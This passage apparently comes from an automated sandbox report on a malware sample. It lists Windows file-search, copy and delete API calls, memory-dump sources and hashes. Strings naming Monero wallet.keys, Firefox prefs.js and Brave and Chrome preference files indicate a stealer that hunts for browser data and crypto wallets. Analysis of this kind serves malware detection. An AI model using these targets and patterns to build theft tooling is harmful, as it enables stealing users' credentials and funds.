                          • FindFirstFileA.KERNEL32(00000000,?,00B10B32,00B10B2B,00000000,?,?,?,00B113F4,00B10B2A), ref: 00AFBEF5
                          • StrCmpCA.SHLWAPI(?,00B113F8), ref: 00AFBF4D
                          • StrCmpCA.SHLWAPI(?,00B113FC), ref: 00AFBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00AFC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 034be22757414b777f589dd62b83d725340431348361fd4910fa01ac0db8846a
                          • Instruction ID: 88441639602963e6ce62cb29b8d7d5414fcea4f3633af2ef49747c988175cd70
                          • Opcode Fuzzy Hash: 034be22757414b777f589dd62b83d725340431348361fd4910fa01ac0db8846a
                          • Instruction Fuzzy Hash: CD424571A1030897DB14FBA4DD96EED77BCAB94300F4089D8B506A61D1EF349F49CBA2
                          APIs
                          • wsprintfA.USER32 ref: 00B0492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                          • StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                          • StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                          • FindClose.KERNEL32(000000FF), ref: 00B04B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 843da0753268fd6ca777a8ac001ee6e7d3d8c2c9ebe95c8e629ef2f60f2ff261
                          • Instruction ID: 50c6bbd3cac8101d06053f2c48e8c3816d6c4c3e8b54b609e6f8fe406fd824fd
                          • Opcode Fuzzy Hash: 843da0753268fd6ca777a8ac001ee6e7d3d8c2c9ebe95c8e629ef2f60f2ff261
                          • Instruction Fuzzy Hash: DB6167B2510218ABCB20EBA4DC85FEA77BCFB48700F4045D8B649D6190EB71DB85CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B04580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B04587
                          • wsprintfA.USER32 ref: 00B045A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B045BD
                          • StrCmpCA.SHLWAPI(?,00B10FC4), ref: 00B045EB
                          • StrCmpCA.SHLWAPI(?,00B10FC8), ref: 00B04601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0468B
                          • FindClose.KERNEL32(000000FF), ref: 00B046A0
                          • lstrcat.KERNEL32(?,018AFC80), ref: 00B046C5
                          • lstrcat.KERNEL32(?,018AE6E8), ref: 00B046D8
                          • lstrlen.KERNEL32(?), ref: 00B046E5
                          • lstrlen.KERNEL32(?), ref: 00B046F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 1cb02a570f536ba9b8c1797767cc1ff38cdbe676f6bea0156686ce8a0ff9f4c3
                          • Instruction ID: 5865cbd5aa2e12d5ffcc70868d275d82b466accfebc53d5033165f34c3c32598
                          • Opcode Fuzzy Hash: 1cb02a570f536ba9b8c1797767cc1ff38cdbe676f6bea0156686ce8a0ff9f4c3
                          • Instruction Fuzzy Hash: 395144B16103189BC724EB74DC89FE977BCAB58300F4045C8B649D6190EF75DB858FA1
                          APIs
                          • wsprintfA.USER32 ref: 00B03EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B03EDA
                          • StrCmpCA.SHLWAPI(?,00B10FAC), ref: 00B03F08
                          • StrCmpCA.SHLWAPI(?,00B10FB0), ref: 00B03F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0406C
                          • FindClose.KERNEL32(000000FF), ref: 00B04081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: fc960528e743d649a95bd1398aea07a6ced6fe1d3b29b2834a8df06a8eaff3e5
                          • Instruction ID: d4993df969561306adb0c5974a7f2b1601070d21f1d679efb4c7308c06af76f1
                          • Opcode Fuzzy Hash: fc960528e743d649a95bd1398aea07a6ced6fe1d3b29b2834a8df06a8eaff3e5
                          • Instruction Fuzzy Hash: 125148B2900318ABCB24FBB4DC85EEA77BCBB54700F4045C8B75996190EB75DB858FA1
                          APIs
                          • wsprintfA.USER32 ref: 00AFED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AFED55
                          • StrCmpCA.SHLWAPI(?,00B11538), ref: 00AFEDAB
                          • StrCmpCA.SHLWAPI(?,00B1153C), ref: 00AFEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00AFF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 4f05e0979c00ec5744e139e6c32c630c07b634778b31190e08824a5058017866
                          • Instruction ID: cf0d562d6ab7da8edef527a1f28c19547df6aca493241853bb624951b6774a30
                          • Opcode Fuzzy Hash: 4f05e0979c00ec5744e139e6c32c630c07b634778b31190e08824a5058017866
                          • Instruction Fuzzy Hash: D3E1B2719113189AEB54FB64DD52EEE77B8AF54300F4089D9B50A620D2EF306F8ACF52
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B115B8,00B10D96), ref: 00AFF71E
                          • StrCmpCA.SHLWAPI(?,00B115BC), ref: 00AFF76F
                          • StrCmpCA.SHLWAPI(?,00B115C0), ref: 00AFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00AFFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 961bbeb686454932c3c45bbc8fb4985e574f2ff4a280db3bf121f80b8fcb80be
                          • Instruction ID: e3f52268f0e73c80291a20304bd3445d2bfa50b8ea88e9d1eda2f5745ba178c0
                          • Opcode Fuzzy Hash: 961bbeb686454932c3c45bbc8fb4985e574f2ff4a280db3bf121f80b8fcb80be
                          • Instruction Fuzzy Hash: 35B111719003089BDB24FF64DD95FEE77B9AF94300F4085E8A50A961D1EF319B49CB92
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B1510C,?,?,?,00B151B4,?,?,00000000,?,00000000), ref: 00AF1923
                          • StrCmpCA.SHLWAPI(?,00B1525C), ref: 00AF1973
                          • StrCmpCA.SHLWAPI(?,00B15304), ref: 00AF1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AF1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00AF1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF1E20
                          • FindClose.KERNEL32(000000FF), ref: 00AF1E32
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 7c79884c8330ef9a4c6845cb779d01812dbf7b3ec3b9a8b04c4fcc93d98e61dd
                          • Instruction ID: b371c142efd5210aa1c8e52002be18a4af91b4eb68216638ef4e7aaf4c2fd72d
                          • Opcode Fuzzy Hash: 7c79884c8330ef9a4c6845cb779d01812dbf7b3ec3b9a8b04c4fcc93d98e61dd
                          • Instruction Fuzzy Hash: 1912DC719103189ADB59FB60DC96EEE77B8AF54300F4089D9B50A620D1EF706F89CFA1
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B10C2E), ref: 00AFDE5E
                          • StrCmpCA.SHLWAPI(?,00B114C8), ref: 00AFDEAE
                          • StrCmpCA.SHLWAPI(?,00B114CC), ref: 00AFDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00AFE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: a07f19897e0349313769b74fc3cff7b2d2d12a6b06e6071fbdea407213ae765c
                          • Instruction ID: 3dfcb8fcbab0b36a95b7b188a6b514347b89adfe040998ad6363905dccab1146
                          • Opcode Fuzzy Hash: a07f19897e0349313769b74fc3cff7b2d2d12a6b06e6071fbdea407213ae765c
                          • Instruction Fuzzy Hash: D7F19E719203189ADB55FB64DD95EEE77B8AF24300F8045D9B50A620D1EF306F8ACF62
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B114B0,00B10C2A), ref: 00AFDAEB
                          • StrCmpCA.SHLWAPI(?,00B114B4), ref: 00AFDB33
                          • StrCmpCA.SHLWAPI(?,00B114B8), ref: 00AFDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00AFDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 59677464a3cd44ca0d9116e5e415b7904d623d3eb4a2a23cd21a78efdc719ddb
                          • Instruction ID: e1b232459619a5e4c837eed26329763f228070e6e6a27b71898c2f6670243b9b
                          • Opcode Fuzzy Hash: 59677464a3cd44ca0d9116e5e415b7904d623d3eb4a2a23cd21a78efdc719ddb
                          • Instruction Fuzzy Hash: 11913572A0030897CB14FBB4DD56EFD77BDAB94300F408A98F946961D1EE349B49CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$:]?{$:u#$;]?{$BIdZ${au$6[]$_u
                          • API String ID: 0-1961496635
                          • Opcode ID: 0a7fdb78607086a42ff57b10316f80dccb247349f5a00988baf1d2449454c88a
